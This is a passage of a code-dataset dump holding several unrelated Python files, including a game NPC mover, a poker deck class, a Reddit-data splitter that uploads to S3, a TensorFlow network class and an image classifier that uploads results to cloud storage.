True\n\t\t\tself.move_to_location(location)\n\t\telse:\n\t\t\tself.tile_location = (self.rect.x/TILESIZE, self.rect.y/TILESIZE)\n\t\t\tself.moving = False\n\n\t\t# If we get to the route location and we are no longer moving,\n\t\t# go to the next location\n\t\tif self.astar_index > 0 and self.moving == False:\n\t\t\tself.astar_index -= 1\n\t\telif self.astar_index <= 0 and self.moving == False:\n\t\t\tif self.route_index < len(self.route)-1:\n\t\t\t\tself.route_index += 1\n\t\t\telse:\n\t\t\t\tself.route_index = 0\n\t\t\tself.set = False\n\t\t\tself.set_index = False\n\n\tdef stop(self):\n\t\tself.speed = 0\n\t\tself.update(False, self.direction)\n","sub_path":"Phase2/Classes/NPC.py","file_name":"NPC.py","file_ext":"py","file_size_in_byte":5926,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"31885398","text":"from ec2 import Ec2\nfrom kubernetes import Kubernetes\nfrom labeler.node_labeler import NodeLabeler\nfrom os import environ\nfrom time import sleep\n\n\ndef main(labeler):\n \n while True:\n labeler.label_nodes()\n sleep(2)\n\n\nif __name__ == '__main__':\n\n vpc_id = environ['VPC']\n region = environ['REGION']\n prefix = environ['LABEL_PREFIX']\n\n infra = Ec2(region, vpc_id)\n kube = Kubernetes()\n labeler = NodeLabeler(infra, kube, prefix)\n\n main(labeler)\n","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":483,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"520542248","text":"__author__ = \"Sean Grogan\"\n__credits__ = [\"Sean Grogan\"]\n__license__ = \"Attribution-NonCommercial-ShareAlike 4.0 International\"\n__version__ = \"1.0\"\n__maintainer__ = \"Sean Grogan\"\n__email__ = \"sean.grogan@gmail.com\"\n__status__ = \"Production\"\nfrom Card import *\nimport random # for the random choice of drawn cards\n\n\nclass DeckOfCards:\n \"\"\"A deck of cards class specifically created for my poker simulation\n \"\"\"\n def __init__(self, number_of_decks=1, jokers=False):\n self.deck = []\n self.base_deck = []\n self.number_of_decks = number_of_decks\n self.seed = None\n suits = ['s', 'c', 'd', 'h']\n digits = [2, 3, 4, 5, 6, 7, 8, 9, 'T', 'J', 'Q', 'K', 'A']\n k = 2\n for j in digits:\n for i in suits:\n c = Card(j, i, k)\n k += 1\n self.base_deck.append(c)\n for i in range(number_of_decks):\n for j in range(len(self.base_deck)):\n self.deck.append(self.base_deck[j])\n if jokers:\n self.base_deck.append(Card('red', 'JOKER'))\n self.base_deck.append(Card('black', 'JOKER'))\n\n def __len__(self):\n return len(self.deck)\n\n def draw_card(self):\n \"\"\"Draws a card from the deck. Returns the card. If the deck is empty returns false.\n \"\"\"\n if len(self.deck) == 0:\n return False\n return self.deck.pop()\n\n def burn_card(self):\n \"\"\"Burns a card from the deck. Poker terminology for drawing a card that isn't in play.\n Returns True if it successfully 'burns the card'. If the deck is empty returns false.\n \"\"\"\n if len(self.deck) == 0:\n return False\n self.deck.pop()\n return True\n\n def shuffle(self):\n \"\"\"Void method that shuffles a deck in place using python's bulilt in RNG.\n \"\"\"\n self.deck = []\n for i in range(self.number_of_decks):\n for j in range(len(self.base_deck)):\n self.deck.append(self.base_deck[j])\n random.shuffle(self.deck)\n\n def random_seed(self, seed=None):\n \"\"\"sets the random seed of the random stream\n \"\"\"\n if seed is not None:\n random.seed(seed)\n\n def remove_card(self, card):\n \"\"\" A unused beta editon method that remove a card from the deck.\n \"\"\"\n for c in range(len(self.deck)):\n a = self.deck[i].number\n b = card.number\n c = self.deck[i].suit\n d = card.suit\n if a == b and c == d:\n self.deck.pop(i)\n return True\n return False\n\n\"\"\"unit testing\"\"\"\nif __name__ == '__main__':\n deck = DeckOfCards()\n deck.shuffle()\n for i in deck.deck:\n print(i, ':', i.key, ' : ', ((i.key - 2) // 4) + 2)\n\n for i in range(53):\n print(deck.draw_card())\n\n print(len(deck))\n deck.shuffle()\n print(len(deck))\n\n pass","sub_path":"DeckOfCards.py","file_name":"DeckOfCards.py","file_ext":"py","file_size_in_byte":2935,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"748850","text":"import bz2\nimport configparser\nimport datetime\nimport itertools\nimport json\nimport logging\nimport lzma\nimport pathlib\nimport os\nimport shutil\nimport sys\nimport time\nimport urllib3\nimport zstandard\nimport redis\n\nimport boto3\nimport bs4\n\n# Load configuration file.\nconfig_parser = configparser.SafeConfigParser()\nconfig_parser.read('config.ini')\n\n# Collect inputs.\nec2_name= sys.argv[1]\ncontent_type = sys.argv[2]\ndownload_start_pos = sys.argv[3]\ndownload_end_pos = sys.argv[4]\nblocksize = int(sys.argv[5])\n\n# EC2 parameters.\nregion = config_parser.get('EC2_Download', 'Region')\nec2_instance_keys = config_parser.get('EC2_Download', 'Instances').split(',')\nprint(ec2_instance_keys)\n\n# S3 parameters. \ns3_bucket_key = config_parser.get('S3','Bucket')\ncontent_type_list = config_parser.get('Elasticsearch', 'Indices').split(',')\n\n# SQS parameters.\nsqs_stream_key = config_parser.get('SQS','Queue')\n\n# Data repository URL.\ndata_source = config_parser.get('Pushshift', 'URL') \ndata_repo_url = f\"{data_source}/{content_type}\"\n\n# S3 parameters\ns3_log_dir_key = f\"{content_type}/logs\"\ns3_raw_dir_key = f\"{content_type}/raw_data\"\ns3_processed_dir_key = f\"{content_type}/processed_data\"\n\n# Define and make local directories. Data should automatically be removed from\n# here.\nparent_dir = pathlib.Path(__file__).parent.resolve()\noutput_dir = parent_dir / \"reddit\" / content_type / \"split_data\"\nlog_dir = parent_dir / \"reddit\" / content_type / \"logs\" \n\noutput_dir.mkdir(parents=True, exist_ok=True)\nlog_dir.mkdir(parents=True, exist_ok=True)\n\n# Logging configuration\nlog_date_format = config_parser.get('Download_Script', 'Log_Date_Format')\nlog_filename = f\"{datetime.datetime.now().strftime(log_date_format)}_{ec2_name}_split_download.log\"\nlog_file_path = log_dir / log_filename\nlog_format = config_parser.get('Download_Script', 'Log_Content_Format')\nlogging_level = logging.WARNING\n\nlogging.basicConfig(filename=log_file_path.resolve().as_posix(),filemode='a',\n format=log_format,\n datefmt=log_date_format,\n level=logging_level)\n\n# Collects link URLs.\ndef web_scrape_links(data_source_url):\n http = urllib3.PoolManager()\n response = http.request('GET', data_source_url)\n soup = bs4.BeautifulSoup(response.data, 'lxml')\n link_list = []\n gib = 0\n print(\"Retrieving link URLs.\")\n for row in soup.findAll('table')[0].tbody.findAll('tr'):\n a = row.findAll('a')[2]\n link_url = data_source_url + a[\"href\"][1:]\n ext = os.path.splitext(link_url)[1]\n if ext in {\".bz2\", \".xz\", \".zst\"}:\n link_list.append(link_url)\n bytesize = int(a.text.replace(',', ''))\n gib += bytesize / 1073741824\n return link_list, gib\n\n\n# Defines what subset of links to download.\ndef set_download_window(start, end, max_length):\n if end == \"end\" or int(end) > max_length:\n end = max_length\n elif int(end) > max_length:\n end = max_length\n else:\n end = int(end)\n if start == \"start\":\n start = 0\n elif int(start) < 0:\n start = 0\n else:\n start = int(start)\n return start, end\n\n\n# Downloads a given link URL.\ndef url_download(url,destination_dir):\n http = urllib3.PoolManager()\n filename = url.rsplit('/', 1)[-1]\n ext = os.path.splitext(url)[1]\n destination_path = (destination_dir / filename).with_suffix(ext)\n with http.request('GET', url, preload_content=False) as r:\n with destination_path.open('wb') as output_file: \n shutil.copyfileobj(r, output_file)\n print(f\"Downloading {filename} from {url} to {destination_path.resolve().as_posix()}.\\n\")\n return destination_path\n\n\n# Check if a file exists in S3.\ndef check_s3_key(s3_bucket, file_key):\n print(f\"Checking if {file_key} exists in {s3_bucket.key}.\")\n loaded = False\n objs = list(s3_bucket.objects.filter(Prefix=file_key))\n if len(objs) == 1 and objs[0].key == file_key:\n loaded = True\n if loaded:\n print(\"File found.\")\n else:\n print(\"File not found.\")\n return loaded\n\nclass S3Exception(Exception):\n pass\n\nclass S3CantUploadException(S3Exception):\n pass\n\nclass S3CantVerifyUploadException(S3Exception):\n pass\n\n# Checks if a file has been completely uploaded to S3. \ndef check_if_uploaded(sqs_queue, s3_bucket, file_key, max_wait_time=.3):\n wait_time = 0\n while max_wait_time < .5:\n try:\n for json_message in sqs_queue.receive_messages():\n message = json.loads(json_message.body)\n try:\n if (message[\"Records\"][0][\"s3\"][\"object\"][\"key\"] == file_key):\n return\n except KeyError:\n continue\n except:\n wait_time +=.1\n time.sleep(.1)\n print(\"Waiting.\")\n last_try = check_s3_key(s3_bucket, file_key)\n if last_try:\n return\n else:\n raise S3CantVerifyUploadException(f\"Can't verify if {file_key} was uploaded.\")\n\n\n# Uploads a file to S3 and verifies upload has completed.\ndef upload_to_s3(s3_bucket, dir_key, input_path, redis_db=None, sqs_queue=None):\n file_key = f\"{dir_key}/{input_path.name}\"\n try:\n print(f\"Pushing [{file_key}] to the s3 bucket [{s3_bucket.name}].\\n\")\n s3_bucket.upload_file(input_path.as_posix(), file_key)\n if redis_db is not None:\n print(f\"Updating Redis with key [{input_path.name}]\")\n redis_db.hset(input_path.name, \"status\", \"unread\")\n print(\"Updated\")\n except Exception as e:\n raise S3CantUploadException(str(e))\n return file_key\n\n\n# Splits a block of bz2 compressed data, unzips it, and formats it to be \n# suitable json for bulk Elasticsearch ingestion. The processed chunk is then\n# compressed by bz2. \ndef bz2_to_bz2(decompressor, bz_block):\n longline = decompressor.decompress(bz_block).decode(\"utf-8\")\n longline = longline.split(\"\\n\", 1)[1]\n longline = longline.rsplit(\"\\n\", 1)[0]\n longline = longline.encode()\n bz_data = bz2.compress(longline)\n return bz_data\n \n# Takes a whole bz2 compressed file and splits it to many. The smaller files\n# are pushed to S3 and then deleted locally.\ndef zip_one_to_many(input_path, output_dir, blocksize, s3_bucket=None, redis_db=None):\n chunk = 0\n header = input_path.stem\n output_list = []\n ext = input_path.suffix\n with input_path.open(mode=\"rb\") as input_file:\n z = bz2.BZ2Decompressor()\n for block in iter(lambda: input_file.read(blocksize), b''):\n filename = f\"{header}_{chunk}{ext}\"\n output_path = output_dir / filename\n dir_key = f\"{s3_processed_dir_key}/{header}\"\n with output_path.open(mode=\"wb\") as output_file:\n zipped_chunk = bz2_to_bz2(z, block)\n output_file.write(zipped_chunk)\n upload_to_s3(s3_bucket, dir_key, output_path, redis_db)\n output_path.unlink()\n chunk += 1\n logging.getLogger().setLevel(logging.INFO)\n logging.info(f\"{filename} successfully split into {chunk} files.\")\n logging.getLogger().setLevel(logging.WARNING)\n upload_to_s3(s3_bucket, s3_log_dir_key, log_file_path)\n return output_list\n\n\ndef s3_download(s3_bucket, file_key, output_path):\n source = file_key\n destination = output_path.resolve().as_posix()\n print(f\"Downloading [{source}] to [{destination}].\")\n s3_bucket.download_file(source, destination)\n print(\"Download complete.\")\n\n\nredis_endpoint = \"\"\nredis_db = redis.Redis(\n host=redis_endpoint,\n port=6379\n )\n\n\n# This is the main function that downloads and splits the compressed bz2 files.\nif __name__ == \"__main__\":\n # Create AWS resource instances.\n s3_resource = boto3.resource(\"s3\", region_name=region)\n sqs_resource = boto3.resource(\"sqs\", region_name=region)\n\n s3_bucket = s3_resource.Bucket(s3_bucket_key)\n sqs_queue = sqs_resource.get_queue_by_name(QueueName=sqs_stream_key)\n \n # Accumulate links to download\n link_list,_ = web_scrape_links(data_repo_url)\n start, end = set_download_window(\n download_start_pos, download_end_pos, len(link_list)\n )\n \n download_pos = start\n successful_downloads = 0\n start_time = time.time()\n skipped = 0\n skip_doc_threshold = int(config_parser.get('Download_Script', 'Skip_Doc_Threshold'))\n skip_chunk_threshold = int(config_parser.get('Download_Script','Skip_Chunk_Threshold'))\n for link_url in itertools.islice(link_list, start, end):\n # Download compressed files from data repository and unzip.\n try:\n #zipped_file_path = url_download(link_url, output_dir)\n filename = link_url.rsplit('/', 1)[-1].rsplit('.', 1)[0] + \".bz2\"\n if \"v2_\" in filename:\n filename = filename.replace(\"v2_\", \"\")\n file_key = f\"{s3_raw_dir_key}/{filename}\"\n print(\"filekey\", file_key)\n zipped_file_path = output_dir / filename\n \n s3_download(s3_bucket, file_key, zipped_file_path)\n \n zip_one_to_many(zipped_file_path, output_dir, blocksize, s3_bucket, redis_db)\n zipped_file_path.unlink()\n logging.getLogger().setLevel(logging.INFO)\n logging.info(f\"Uploaded {zipped_file_path.resolve().as_posix()}.\")\n logging.getLogger().setLevel(logging.WARNING)\n except Exception as e:\n if skipped < skip_doc_threshold:\n logging.warning(f\"Trouble splitting {zipped_file_path.resolve().as_posix()}. Skipping file.\")\n skipped += 1\n continue\n else:\n logging.warning(f\"Trouble splitting {zipped_file_path.resolve().as_posix()}.\")\n logging.warning(\"Too many files are being skipped. Terminating download.\")\n sys.exit() \n end_time = time.time()\n delta = end_time - start_time\n print(f\"Download completed in {delta} seconds.\")\n logging.getLogger().setLevel(logging.INFO)\n logging.info(f\"Download completed in {delta} seconds\")\n upload_to_s3(s3_bucket, s3_log_dir_key, log_file_path)\n log_file_path.unlink()\n \n","sub_path":"preprocessing-scripts/one_to_many.py","file_name":"one_to_many.py","file_ext":"py","file_size_in_byte":10205,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"149550491","text":"'''\n Created by awandzel on 11/01/18.\n'''\nimport copy\n\n\nclass LanguageCommand:\n languageToRoom = {}\n languageToClass = {}\n classToRooms = {}\n languageObservation = {}\n\n def __init__(self, Rooms, objectClasses):\n self.Rooms = Rooms\n self.objectClasses = objectClasses\n\n def setVocabularyforClass(self):\n self.languageToClass[(\"mug\", \"mugs\")] = 0\n self.languageToClass[(\"book\", \"books\")] = 1\n self.languageToClass[(\"key\", \"keys\")] = 2\n self.languageToClass[(\"remote\", \"remotes\")] = 3\n self.languageToClass[(\"person\", \"persons\")] = 4\n\n def setVocabularyForRooms(self):\n self.languageToRoom[\"kitchen\"] = 0\n self.languageToRoom[\"library\"] = 1\n self.languageToRoom[\"storage\"] = 2\n self.languageToRoom[\"livingroom\"] = 3\n self.languageToRoom[\"robotics\"] = 4\n self.languageToRoom[\"classroomA\"] = 5\n self.languageToRoom[\"classroomB\"] = 6\n self.languageToRoom[\"classroomC\"] = 7\n self.languageToRoom[\"classroomD\"] = 8\n\n # Language command parsing structure:\n # for c classes : extract sequential pair (class, )\n def parseLanguageCommand(self, command, randomRoom = None):\n self.setVocabularyforClass()\n self.setVocabularyForRooms()\n\n #initialize mapping from class to room to []\n for c in range(len(self.objectClasses)):\n self.classToRooms[c] = []\n\n # e.g. mug in or and book in \n currentClass = \"\"\n words = command.split()\n for w in words:\n\n for c in self.languageToClass:\n if w in c:\n currentClass = self.languageToClass[c]\n if self.languageToClass[c] >= len(self.objectClasses): raise Exception(\"Error: referenced class exceeds number of object classes\")\n\n if w in self.languageToRoom:\n # Randomize room for simulation\n if randomRoom is not None:\n self.classToRooms[currentClass].append(randomRoom.randrange(self.Rooms.numberOfRooms))\n else:\n self.classToRooms[currentClass].append(self.languageToRoom[w])\n if self.languageToRoom[w] >= self.Rooms.numberOfRooms: raise Exception(\"Error: referenced room exceeds number of rooms\")\n\n #for not mentioned classes assume all rooms (no information)\n for c in self.classToRooms:\n if not self.classToRooms[c]:\n self.classToRooms[c] = [i for i in range(self.Rooms.numberOfRooms)]\n\n\n def translateToObservation(self, psi):\n numberOfObjects = 0\n\n #iterate over all referenced classes\n for c in self.classToRooms:\n normRefRooms, normNotRefRooms = self.normalizationConstant(self.classToRooms[c])\n objObservation = self.objectLanguageObservation(self.classToRooms[c], psi, normRefRooms, normNotRefRooms)\n\n #ground to object i\n for o in range(self.objectClasses[c]):\n self.languageObservation[numberOfObjects] = copy.deepcopy(objObservation)\n numberOfObjects += 1\n\n #for each set of referenced rooms count number of locations in each\n def normalizationConstant(self, referencedRooms):\n normRefRooms = normNotRefRooms = 0\n for r in range(self.Rooms.numberOfRooms):\n if r in referencedRooms:\n normRefRooms += len(self.Rooms.roomToLocationsMapping[r])\n else:\n normNotRefRooms += len(self.Rooms.roomToLocationsMapping[r])\n return normRefRooms, normNotRefRooms\n\n\n # for each room: if referenced: 1.0 - psi / #roomsReferenced, else: psi / #roomsNotReferenced\n def objectLanguageObservation(self, referencedRooms, psi, normRefRooms, normNotRefRooms):\n objObservation = {}\n for r in range(self.Rooms.numberOfRooms):\n for l in self.Rooms.roomToLocationsMapping[r]:\n #only translate into observation if informative (i.e. not uniform)\n if len(referencedRooms) < self.Rooms.numberOfRooms:\n prob = (1.0 - psi) / normRefRooms if r in referencedRooms else psi / normNotRefRooms\n else:\n prob = 1.0\n objObservation[l] = prob\n return objObservation\n\n #iterate over each object / location and perform a pairwise multiplication w/ languageObservation\n def beliefUpdate(self, beliefPrior):\n updatedBelief = {}\n\n for o in range(len(beliefPrior)):\n updatedObjBelief = {}\n normalization = 0.0\n\n for l in beliefPrior[o]:\n prob = beliefPrior[o][l] * self.languageObservation[o][l] #pairwise multiplication\n normalization += prob\n updatedObjBelief[l] = prob\n\n for l in updatedObjBelief: updatedObjBelief[l] /= normalization\n updatedBelief[o] = updatedObjBelief\n return updatedBelief\n","sub_path":"Multi_Object_Search/Core/LanguageCommand.py","file_name":"LanguageCommand.py","file_ext":"py","file_size_in_byte":4977,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"100159762","text":"# coding: utf-8\n\n# 処理概要 「DeepNeralNetworkClass」\n# 機能名 「ディープラーニングクラス」\n# 変更日 2017/12/12\n'''\n ニューラルネットワークのクラス化\n\n'''\nimport numpy as np\nimport tensorflow as tf\nfrom sklearn.utils import shuffle\n\n\nclass DNN(object):\n\n #初期化処理\n def __init__(self,n_in,n_hiddens, n_out):\n self.n_in = n_in\n self.n_hiddens = n_hiddens\n self.n_out = n_out\n self.weights = []\n self.biases = []\n self.x_ = None\n self.t_ = None\n self.y_ = None\n self.keep_prob = None\n self.acuracy_ = None\n self._sess = None\n self._history = {\n 'loss' : [],\n 'acuracy' : [],\n 'class':[]\n }\n tf.reset_default_graph()\n \n # 重みの設定\n def weight_variable(self,shape,name=None):\n initial = tf.truncated_normal( shape , stddev = 0.01)\n return tf.Variable(initial,name=name)\n\n\n # バイアスの設定\n def bias_variable(self,shape,name=None):\n initial = tf.zeros(shape)\n return tf.Variable(initial,name=name)\n\n\n # モデルの定義\n def interface(self,x,keep_prob):\n # 入力層・隠れ層 / 隠れ層・隠れ層\n for i , n_hidden in enumerate(self.n_hiddens):\n if i == 0:\n # 入力層\n input = x\n input_dim = self.n_in\n else:\n # 隠れ層 / 隠れ層 \n input = output\n input_dim = self.n_hiddens[i - 1]\n \n self.weights.append(self.weight_variable([input_dim,n_hidden],name='W_{}'.format(i)))\n self.biases.append(self.bias_variable([n_hidden],name='b_{}'.format(i)))\n \n \n h = tf.nn.relu(tf.matmul(input,self.weights[-1]) + self.biases[-1])\n output = tf.nn.dropout(h , keep_prob)\n \n \n # 隠れ層 / 出力層 \n self.weights.append(self.weight_variable([self.n_hiddens[-1],self.n_out],name='W_{}'.format(len(self.n_hiddens))))\n self.biases.append(self.bias_variable([self.n_out],name='b_{}'.format(len(self.n_hiddens))))\n \n # 計算\n # y = tf.nn.softmax(tf.matmul(output,self.weights[-1]) + self.biases[-1])\n # シグモイド関数で実装する。\n # y = tf.nn.sigmoid(tf.matmul(output,self.weights[-1]) + self.biases[-1])\n # 双曲線関数を利用\n # y = tf.nn.tanh(tf.matmul(output,self.weights[-1]) + self.biases[-1])\n y = tf.nn.relu(tf.matmul(output,self.weights[-1]) + self.biases[-1])\n return y\n\n\n # 誤差関数の定義\n def loss(self , y ,t):\n # cross_entropy = tf.reduce_mean(-tf.reduce_sum(t * tf.log(y),reduction_indices=[1]))\n # cross_entropy = - tf.reduce_sum(t * tf.log(y)+ ( 1- t )*tf.log(1-y))\n cross_entropy = tf.reduce_sum(tf.square(y - t))\n return cross_entropy\n \n\n # 学習アルゴリズの定義\n def training(self,loss):\n #optimaizer = tf.train.GradientDescentOptimizer(0.01)\n optimaizer = tf.train.AdagradOptimizer(0.01)\n \n train_step = optimaizer.minimize(loss)\n return train_step\n\n\n # 学習の評価\n def acuracy(self,y,t):\n # correct_prediction = tf.equal(tf.argmax(y,1),tf.argmax(t,1))\n correct_prediction = tf.equal(tf.to_float(tf.greater(y,0.5)),t)\n acuracy = tf.reduce_mean(tf.cast(correct_prediction,tf.float32)) \n return acuracy\n\n\n\n # 学習の処\n def fit(self,X_train,Y_train,epochs=100,batch_size=100,p_keep=0.5,verbose=1,path=None):\n x = tf.placeholder(tf.float32, shape=[None,self.n_in],name='input')\n t = tf.placeholder(tf.float32, shape=[None,self.n_out])\n keep_prob = tf.placeholder(tf.float32) \n\n self.x_ = x\n self.t_ = t\n self.keep_prob = keep_prob\n\n\n y = self.interface(x,keep_prob)\n self.y_ = y \n loss = self.loss(y,t)\n train_step = self.training(loss)\n acuracy = self.acuracy(y,t)\n self.acuracy_ = acuracy\n\n init = tf.global_variables_initializer()\n sess = tf.Session()\n sess.run(init)\n\n self._sess = sess\n \n # モデルの保村\n saver = tf.train.Saver() \n \n\n N_train = len(X_train)\n n_batches = N_train // batch_size\n \n for epoch in range(epochs):\n X_,Y_ = shuffle(X_train,Y_train)\n \n for i in range(n_batches):\n start = i * batch_size\n end = start + batch_size\n \n \n \n sess.run(train_step,feed_dict = {\n x : X_[start:end],\n t : Y_[start:end],\n keep_prob : p_keep\n })\n \n loss_ = loss.eval(session=sess,feed_dict = {\n x : X_train,\n t : Y_train,\n keep_prob : 0.5\n })\n \n \n acuracy_ = acuracy.eval(session=sess,feed_dict = {\n x : X_train,\n t : Y_train,\n keep_prob : 0.5\n })\n\n self._history['acuracy'].append(acuracy_)\n self._history['loss'].append(loss_)\n \n if verbose:\n print('epoch:',epoch,' loss:',loss_,' acuracy:',acuracy_)\n \n # モデルの保存\n saver.save(sess, path + \"/model.ckpt\") \n return self._history\n\n\n # 学習の評価処理\n def evaluate(self,X_test,Y_test):\n return self.acuracy_.eval(session=self._sess,feed_dict = {\n self.x_ : X_test,\n self.t_ : Y_test,\n self.keep_prob : 0.5\n })\n\n\n # ��習結果からの確立を取得する。\n def getrate(self,X_test):\n prob = self.y_.eval(session=self._sess,feed_dict = {\n self.x_ : X_test,\n self.keep_prob : 1.0\n })\n self._sess.close\n return prob\n\n\n # 学習結果を復元する。\n def getRestore(self,X_test,path):\n tf.reset_default_graph()\n x = tf.placeholder(tf.float32, shape=[None,self.n_in],name='input')\n t = tf.placeholder(tf.float32, shape=[None,self.n_out])\n keep_prob = tf.placeholder(tf.float32) \n\n self.x_ = x\n self.t_ = t\n self.keep_prob = keep_prob\n\n\n y = self.interface(x,keep_prob)\n loss = self.loss(y,t)\n train_step = self.training(loss)\n acuracy = self.acuracy(y,t)\n self.acuracy_ = acuracy\n\n saver = tf.train.Saver()\n sess = tf.Session()\n self._sess = sess\n \n saver.restore(sess, \"./\" + path + \"/model.ckpt\") \n result_prob2 = y.eval(session=sess,feed_dict = {\n x : X_test,\n keep_prob : 1.0\n })\n return result_prob2\n","sub_path":"source/batch/machinelearn/relu_DNN/DNN_class.py","file_name":"DNN_class.py","file_ext":"py","file_size_in_byte":6934,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"546491460","text":"from keras.preprocessing.image import img_to_array\nfrom keras.models import load_model\nfrom keras import backend as K\nimport numpy as np\nimport imutils\nimport cv2\nimport tempfile\nimport boto3\nimport os\nfrom azure.storage.blob import BlockBlobService, PublicAccess\nfrom google.cloud import storage\n\n\nclass NotSanta:\n\n def classify(self, model_name, image_path):\n \n # load the trained convolutional neural network\n model = load_model(model_name)\n\n # load the image\n image = cv2.imread(image_path)\n orig = image.copy()\n\n # pre-process the image for classification\n image = cv2.resize(image, (100, 100))\n image = image.astype(\"float\") / 255.0\n image = img_to_array(image)\n image = np.expand_dims(image, axis=0)\n\n # classify the input image\n (unkown, car, cat) = model.predict(image)[0]\n\n # build the label\n if car > unkown and car > cat:\n label = \"CAR\"\n proba =car \n elif cat > unkown and cat > car:\n label = \"CAT\"\n proba = cat\n else: \n label = \"What?\"\n proba = unkown\n\n label = \"{}: {:.2f}%\".format(label, proba * 100)\n\n # draw the label on the image\n output = imutils.resize(orig, width=400)\n\n cv2.putText(output, label, (10, 25), cv2.FONT_HERSHEY_SIMPLEX,\n\t 1, (0, 255, 0), 3)\n\n f = tempfile.NamedTemporaryFile(mode='w+b', delete=False, dir='static', suffix='.jpg')\n cv2.imwrite( f.name, output)\n\n del model\n K.clear_session()\n \n return(f.name)\n\n\nclass ObjectStore:\n\n def __init__(self, OBJECT_STORE, filepath):\n self.store = OBJECT_STORE\n self.filepath = filepath\n\n def upload(self): \n\n filepath = self.filepath\n store = self.store\n\n if store == 's3':\n result = self.s3_upload(filepath)\n elif store == 'blob':\n result = self.blob_upload(filepath)\n elif store == 'goog':\n result = self.goog_upload(filepath)\n elif store == 'local':\n filename = os.path.basename(filepath)\n return(filename)\n else: \n raise\n\n return(result)\n\n def s3_upload(self, filepath):\n\n S3_BUCKET_NAME = os.environ.get(\"S3_BUCKET_NAME\")\n S3_KEY = os.environ.get(\"S3_KEY\")\n S3_SECRET = os.environ.get(\"S3_SECRET\")\n S3_LOCATION = 'http://{}.s3.amazonaws.com/'.format(S3_BUCKET_NAME)\n\n s3 = boto3.client(\n \"s3\",\n aws_access_key_id=S3_KEY,\n aws_secret_access_key=S3_SECRET\n )\n\n filename = os.path.basename(filepath)\n\n try:\n s3.upload_file(\n filepath,\n S3_BUCKET_NAME,\n filename,\n ExtraArgs={\n \"ACL\": \"public-read\"\n }\n )\n s3_result = \"{}{}\".format(S3_LOCATION, filename)\n return(s3_result)\n\n except Exception as e:\n print(\"S3 ERROR: \", e)\n raise\n\n\n def blob_upload(self, filepath):\n\n BLOB_CONTAINER = os.environ.get(\"BLOB_CONTAINER\")\n BLOB_KEY = os.environ.get(\"BLOB_KEY\")\n BLOB_ACCOUNT = os.environ.get(\"BLOB_ACCOUNT\")\n\n filename = os.path.basename(filepath)\n\n try:\n\n block_blob_service = BlockBlobService(\n account_name=BLOB_ACCOUNT, \n account_key=BLOB_KEY)\n\n block_blob_service.create_blob_from_path(\n BLOB_CONTAINER,\n filename,\n filepath)\n\n blob_result = \"https://{}.blob.core.windows.net/results/{}\".format(BLOB_ACCOUNT, filename)\n\n except Exception as e:\n print(\"BLOB ERROR: \", e)\n \n return(blob_result)\n \n\n def goog_upload(sefl, filepath):\n\n bucket_name = os.environ.get(\"GOOG_BUCKET_NAME\")\n destination_blob_name = os.path.basename(filepath)\n \n try: \n storage_client = storage.Client()\n bucket = storage_client.get_bucket(bucket_name)\n blob = bucket.blob(destination_blob_name)\n blob.upload_from_filename(filepath)\n return(blob.public_url)\n except Exception as e:\n print(\"Google Storage ERROR: \", e)\n \n\n\n\n\n\n","sub_path":"app/lib.py","file_name":"lib.py","file_ext":"py","file_size_in_byte":4353,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"650125574","text":"# Copyright (c) YugaByte, Inc.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\"); you may not use this file except\n# in compliance with the License. You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software distributed under the License\n# is distributed on an \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express\n# or implied. See the License for the specific language governing permissions and limitations\n# under the License.\n#\n\n\"\"\"\nHelps find the Linuxbrew installation.\n\"\"\"\n\nimport os\nimport sys\nfrom yb.command_util import run_program\nfrom yb.common_util import safe_path_join\n\n\ng_linuxbrew_dir = None\ng_build_root = None\n\nYB_SRC_ROOT = os.path.join(os.path.dirname(os.path.realpath(__file__)), '..', '..')\n\n\nclass LinuxbrewHome:\n def __init__(self, build_root=None):\n old_build_root = os.environ.get('BUILD_ROOT')\n if build_root is not None:\n os.environ['BUILD_ROOT'] = build_root\n else:\n build_root = os.environ.get('BUILD_ROOT')\n self.linuxbrew_dir = None\n self.linuxbrew_link_target = None\n self.cellar_glibc_dir = None\n self.ldd_path = None\n self.ld_so_path = None\n self.patchelf_path = None\n\n try:\n find_script_result = run_program(os.path.join(\n YB_SRC_ROOT, 'build-support', 'find_linuxbrew.sh'))\n linuxbrew_dir = find_script_result.stdout.strip()\n if not linuxbrew_dir:\n return\n if not os.path.isdir(linuxbrew_dir) and os.path.exists('/etc/centos-release'):\n raise RuntimeError(\n (\"Directory returned by the '{}' script does not exist: '{}'. \" +\n \"This is only an error on CentOS. Details: {}\").format(\n find_script_result.program_path,\n linuxbrew_dir,\n find_script_result))\n self.linuxbrew_dir = os.path.realpath(linuxbrew_dir)\n\n # Directories derived from the Linuxbrew top-level one.\n self.linuxbrew_link_target = os.path.realpath(linuxbrew_dir)\n self.cellar_glibc_dir = safe_path_join(self.linuxbrew_dir, 'Cellar', 'glibc')\n self.ldd_path = safe_path_join(self.linuxbrew_dir, 'bin', 'ldd')\n self.ld_so_path = safe_path_join(self.linuxbrew_dir, 'lib', 'ld.so')\n self.patchelf_path = safe_path_join(self.linuxbrew_dir, 'bin', 'patchelf')\n finally:\n if old_build_root is None:\n if 'BUILD_ROOT' in os.environ:\n del os.environ['BUILD_ROOT']\n else:\n os.environ['BUILD_ROOT'] = old_build_root\n\n def path_is_in_linuxbrew_dir(self, path):\n path = os.path.abspath(path)\n return (path.startswith(self.linuxbrew_dir + '/') or\n path.startswith(self.linuxbrew_link_target + '/'))\n\n def get_human_readable_dirs(self):\n return ', '.join(\"'%s'\" % d for d in\n sorted(set([self.linuxbrew_dir, self.linuxbrew_link_target])))\n\n\ndef set_build_root(build_root):\n global 